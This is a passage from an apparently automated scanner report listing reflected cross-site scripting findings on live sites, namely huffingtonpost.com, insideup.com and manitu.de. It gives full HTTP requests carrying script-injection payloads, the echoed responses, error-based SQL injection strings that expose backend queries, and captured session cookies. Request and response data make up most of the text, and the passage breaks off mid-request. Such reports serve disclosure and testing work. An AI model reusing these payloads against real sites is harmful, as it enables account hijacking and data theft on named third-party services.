GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorousd63f1<img%20src%3da%20onerror%3dalert(1)>fdda9b0981e&gn=window.Badges_216861968_1&eu=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&id=840995&eco=1301155920&ebi2&entry_design=&cb=window.Badges_216861968_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1300987757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1364029523-1300987777508; __qseg=Q_D|Q_T|Q_2687|Q_2685|Q_2402|Q_1910|Q_1908|Q_1905|Q_1592|Q_683|Q_682|Q_680|Q_679|Q_678|Q_677|Q_676|Q_666|Q_665|Q_660|Q_657; huffpost_adssale=y; s_pers=%20s_getnr%3D1301171811856-Repeat%7C1364243811856%3B%20s_nrgvo%3DRepeat%7C1364243811860%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; huffpo_type_views=%7B%222%22%3A1%7D; __utma=265287574.492257335.1300987757.1300987757.1301171812.2; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1301171812

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 20:36:16 GMT
Content-Length: 7560
Connection: close

window.Badges_216861968_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorousd63f1<img src=a onerror=alert(1)>fdda9b0981e"],"global_name":"window.Badges_216861968_1","slice_params":{"facebook_glamorous":{"share_amount":"3,283"},"retweet_glamorous":{"short_url":"http:\/\/huff.to\/hL3Bum","tweet_text":"BREAKING: Geraldine
...[SNIP]...
5.81. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /permalink-tracker.html

Issue detail

The value of the vertical request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 351ba"%3balert(1)//b9d3a987aa3 was submitted in the vertical parameter. This input was echoed as 351ba";alert(1)//b9d3a987aa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /permalink-tracker.html?vertical=politics351ba"%3balert(1)//b9d3a987aa3 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1300987757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1364029523-1300987777508; __qseg=Q_D|Q_T|Q_2687|Q_2685|Q_2402|Q_1910|Q_1908|Q_1905|Q_1592|Q_683|Q_682|Q_680|Q_679|Q_678|Q_677|Q_676|Q_666|Q_665|Q_660|Q_657; huffpost_adssale=y; s_pers=%20s_getnr%3D1301171811856-Repeat%7C1364243811856%3B%20s_nrgvo%3DRepeat%7C1364243811860%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; huffpo_type_views=%7B%222%22%3A1%7D; __utma=265287574.492257335.1300987757.1300987757.1301171812.2; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.6.10.1301171812

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=289
Date: Sat, 26 Mar 2011 20:36:20 GMT
Content-Length: 994
Connection: close

<html>
<head>
<title>Huffit Tracker</title>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_config.js%2Chp_track.js&amp;v44491"></script>
</head>
<body>
   <!-- Con
...[SNIP]...
<script type="text/javascript">
       HPConfig.current_vertical_name = "politics351ba";alert(1)//b9d3a987aa3";
       HPConfig.current_web_address = "www.huffingtonpost.com";
       HPConfig.inst_type = "prod";
       HPConfig.timestamp_for_clearing_js = "1301078667";
   </script>
...[SNIP]...
5.82. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The value of the iusrc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dd63"><script>alert(1)</script>53698cadc19 was submitted in the iusrc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=34dd63"><script>alert(1)</script>53698cadc19 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47863


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<input type="hidden" name="iusrc" value="34dd63"><script>alert(1)</script>53698cadc19 ">
...[SNIP]...
5.83. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6306'%3balert(1)//ea983b03af0 was submitted in the REST URL parameter 2. This input was echoed as b6306';alert(1)//ea983b03af0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ppc/leadflowb6306'%3balert(1)//ea983b03af0/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:23 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5333
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lead_flow_template temps on temps.template_id = prj.templateId
   left join lead_flow_group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflowb6306';alert(1)//ea983b03af0/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...
5.84. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload beb88'%3balert(1)//2d44c5a2fc8 was submitted in the REST URL parameter 3. This input was echoed as beb88';alert(1)//2d44c5a2fc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ppc/leadflow/hins00beb88'%3balert(1)//2d44c5a2fc8/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5333
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lead_flow_template temps on temps.template_id = prj.templateId
   left join lead_flow_group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/hins00beb88';alert(1)//2d44c5a2fc8/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...
5.85. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f34e'%3balert(1)//49eac350b90 was submitted in the REST URL parameter 4. This input was echoed as 5f34e';alert(1)//49eac350b90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ppc/leadflow/hins00/project.php5f34e'%3balert(1)//49eac350b90?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:21:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5333
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lead_flow_template temps on temps.template_id = prj.templateId
   left join lead_flow_group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/hins00/project.php5f34e';alert(1)//49eac350b90?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...
5.86. http://www.insideup.com/ppc/leadflow/hins00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The value of the catId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1ac5'%3balert(1)//63a331a2c77 was submitted in the catId parameter. This input was echoed as e1ac5';alert(1)//63a331a2c77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002e1ac5'%3balert(1)//63a331a2c77&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5333
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lead_flow_template temps on temps.template_id = prj.templateId
   left join lead_flow_group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002e1ac5';alert(1)//63a331a2c77&iusrc='+(select 1 and row(1,1)>
...[SNIP]...
5.87. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The value of the iusrc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0cdd"><script>alert(1)</script>6d45ca83c0c was submitted in the iusrc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=f0cdd"><script>alert(1)</script>6d45ca83c0c HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53862


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<input type="hidden" name="iusrc" value="f0cdd"><script>alert(1)</script>6d45ca83c0c ">
...[SNIP]...
5.88. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The value of the iusrc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77a25'%3balert(1)//b75a0f29006 was submitted in the iusrc parameter. This input was echoed as 77a25';alert(1)//b75a0f29006 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%2777a25'%3balert(1)//b75a0f29006 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5333
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'77a25';alert(1)//b75a0f29006' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...
5.89. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84466'%3balert(1)//201a5427a00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84466';alert(1)//201a5427a00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27&84466'%3balert(1)//201a5427a00=1 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5363
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&84466';alert(1)//201a5427a00=1' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...
5.90. http://www.manitu.de/shop/ [account_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the account_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e0c2"><script>alert(1)</script>e1fa66e6668 was submitted in the account_id parameter. This input was echoed as 6e0c2\"><script>alert(1)</script>e1fa66e6668 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=6e0c2"><script>alert(1)</script>e1fa66e6668&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
